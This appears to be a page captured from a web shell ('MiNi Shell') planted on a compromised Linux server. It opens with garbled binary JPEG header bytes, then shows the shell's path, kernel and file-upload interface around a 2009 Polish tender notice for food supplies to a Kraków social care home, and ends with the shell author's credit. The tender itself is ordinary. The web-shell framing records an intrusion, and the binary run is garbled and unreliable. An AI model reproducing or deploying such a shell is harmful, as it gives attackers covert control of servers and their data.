JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/47917-N-2009.html

<p class="kh_header"><b>Kraków: OGŁOSZENIE O ZAMÓWIENIU PUBLICZNYM
w trybie przetargu nieograniczonego o wartości nieprzekraczającej kwot określonych w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych
na dostawę artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 47917 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Praska 25, 30-329 Kraków, woj. małopolskie, tel. 012 2660364, faks 012 2660364 w. 27.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom pomocy społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OGŁOSZENIE O ZAMÓWIENIU PUBLICZNYM
w trybie przetargu nieograniczonego o wartości nieprzekraczającej kwot określonych w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych
na dostawę artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych.

Wspólny Słownik Zamówień (CPV): 03221000-6, 03222300-6, 15811000-6, 15331170-9, 03142500-3, 15800000-6.
Zamawiający dopuszcza składanie ofert częściowych. 
Część I będzie obejmować świeże warzywa i owoce.
Część II będzie obejmować wyroby piekarskie.
Część III będzie obejmować mrożone artykuły spożywcze.
Część IV będzie obejmować jaja kurze świeże.
Część V będzie obejmować artykuły spożywcze sypkie, koncentraty, przyprawy i desery.

Zamawiający nie dopuszcza składania ofert wariantowych.
Zamawiający przewiduje zamówienia uzupełniające..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 15.81.10.00-6, 15.33.11.70-9, 03.14.25.00-3, 15.80.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu może wziąć udział wykonawca, który:
spełnia warunki, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), w tym nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy.

ocena spełnienia warunków, o których mowa, będzie dokonana na podstawie złożonych przez Wykonawcę dokumentu, o którym mowa niżej oraz oświadczenia - z dokumentów oraz oświadczenia powinno wynikać, że Wykonawca spełnia warunki, o których mowa w art. 22 ust. 1 ustawy, w tym nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)oświadczenie o spełnieniu warunków udziału w postępowaniu,
2)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu,
 
UWAGA 1. 	Dokument, o którym mowa w pkt 2 może być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę, tzn. opatrzony datą (datą poświadczenia, nie zaś jakąkolwiek inną datą znajdującą się na kserokopii dokumentu, choćby pochodziła z dnia poświadczenia), napisem za zgodność z oryginałem oraz podpisany przez osoby podpisujące ofertę lub przez osoby upoważnione do poświadczenia zgodności z oryginałem kserokopii dokumentów - w takim przypadku wraz z dokumentami Wykonawca powinien przedłożyć dokumenty, z treści których wynika umocowanie do dokonania tej czynności, o ile nie wynika ono z innych dokumentów składanych wraz z ofertą. W przypadku, gdy dokument składa się z więcej niż jednej strony, kserokopia każdej strony powinna być poświadczona za zgodność z oryginałem, w sposób opisany wyżej.
UWAGA 2. 	Oświadczenie, o którym mowa w pkt 1, powinno być podpisane przez osoby podpisujące ofertę.
UWAGA 3. 	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, oświadczenie, o którym mowa w pkt 1, w zakresie niepodlegania wykluczeniu z postępowania, oraz dokument, o którym mowa w pkt 2  powinien być złożony przez każdego z Wykonawców.
UWAGA 4. 	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 2 składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości,
Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upły-wem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej ul. Praska 25      30-329 Kraków tel. 012/266 03 64.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2009 godzina 12:30, miejsce: Dom Pomocy Społecznej ul. Praska 25   30-329 Kraków - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świeże warzywa i owoce.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2
Buraki
1 050 kg
3
Botwina
   250 szt
4
Brzoskwinie
   100 kg
5
Cebula
   800 kg
6
Czosnek 
   200 szt
7
Cytryny
     10 kg
8
Fasola Jaś
   100 kg
9
Fasola szparagowa/żółta/
     80 kg
10
Groch Viktoria
   120 kg
11
Gruszki
     50 kg
12
Jabłka
 1500 kg
13
Kapusta kiszona
  350 kg
14
Kapusta czerwona
  100 kg
15
Kapusta biała
  500 kg
16
Kalafior
  200 kg
17
Koper świeży
  700 szt
18
Kapusta włoska
  300 szt
19
Kalarepa
    50 szt
20
Kapusta pekińska
  150 szt
21
Marchew
 1450 kg
22
Ogórek kiszony
   650 kg
23
Ogórek świeży
   250 kg
24
Pory
   900 szt
25
Pomarańcze
   150 kg
26
Pieczarki
   180 kg
27
Pomidory
   650 kg
28
Pietruszka zielona
   750 szt
29
Rabarbar
   100 kg
30
Rzodkiewka
   300 szt
31
Seler
   600 kg
32
Szczypior
    350 szt
33
Sałata zielona
    450 szt
34
Śliwy
       80 kg
35
Truskawki
     100 kg
36
Ziemniaki
11 750 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb  krakowski
(niekrojony 0,60 kg)
9 200 szt
Bułka pszenna
(0,05 kg)
 40 800 szt
Chleb graham
(niekrojony 0,45 kg)
1 700 szt
Weka (0,40kg)
60 szt
Bułka tarta
100 kg
Drożdżówki
2 000 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> mrożone artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuł
60 kg
Bruksela
60 kg
Fasolka szparagowa zielona
50 kg
Kalafior
80 kg
Mieszanka.kompotowa 4 skł.
350 kg
Mieszanka warzywna 3 skł.
80 kg
Szpinak
220 kg
Truskawka
100 kg
Filet rybny Panga biała
250 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> jaja kurze świeże o gramaturze 50 g.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 22 800 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> artykuły spożywcze sypkie, koncentraty, przyprawy i desery.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aromaty do ciast
40 szt
Budyń (różne smaki) 1 kg
65 kg
Budyń bezcukrowy (różne smaki) 40 g
300 szt
Cukier kryształ 1 kg
2100 kg
Cukier puder 0,5 kg
70 kg
Chrzan tarty Polonaise  180 g
400 szt
Cukier waniliowy 
 20 g
100 szt
Cynamon 20 g
50 szt
Dżem wysokosłodzony (różne smaki) 260 g
250 szt
Dżem bezcukrowy (różne smaki) 200 g
200 szt
Groszek konserwowy 400 g
200 szt
Herbata granulowana
indyjska 100 g
70 kg
Kasza manna 1 kg
250 kg
Kasza jęczmienna 
1 kg  
200 kg
Kwasek cytrynowy 20 g
200 szt
Kminek 20 g
400 szt
Szproty w pomidorach 170 g
450 szt
Szproty w oleju 170 g
450 szt
Koncentrat pomidorowy 890 g
250 szt
Kisiel bezcukrowy (różne smaki) 40 g
400 szt
Kisiel bezcukrowy (różne smaki) 1 kg
40 kg
Pasztet drobiowy 
110 g
800 szt
Kakao 200 g
100 szt
Kawa Inka 150 g
500 szt
Kasza gryczana 1 kg
50 kg
Ketchup łagodny 
0,5 l
120 szt
Liść laurowy 5 g
70 szt
Mąka pszenna poznańska 1 kg
1100 kg
Majeranek 20 g
100 szt
Musztarda 0,9 l
100 szt
Mąka ziemniaczana 
1 kg
70 kg
Makaron (różne kształty) 1 kg
750 kg
Majonez 0,9 l
100 szt
Ogórek konserwowy 0,9 l
200 szt
Olej uniwersalny 
0,9 l
100 szt
Ocet 0,5 l   10%
70 szt
Przyprawa w płynie Winiary 0,9 l
400 szt
Papryka mielona słodka 20 g
400 szt
Pieprz naturalny ziarno luz
6 kg
Powidła śliwkowe 0,9 l
60 szt
Marmolada wieloowocowa 0,9 l
60 szt
Płatki owsiane górskie 0,5 kg
150 kg
Papryka konserwowa 0,9 l
45 szt
Przyprawa do kurczaka  20 g
80 szt
Ryż 1 kg
500 kg
Sól jodowana 1 kg
450 kg
Suchary delikatesowe bezcukrowe 285 g
80 szt
Syrop Paola (różne smaki)  335 ml
120 szt
Szczaw konserwowy 320 g
50 szt
Przyprawa Kucharek 1 kg
45 kg
Ziele angielskie 20 g
80 szt
Wafle bezcukrowe 
80 g
400 szt
Listki waflowe 43 g
400 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com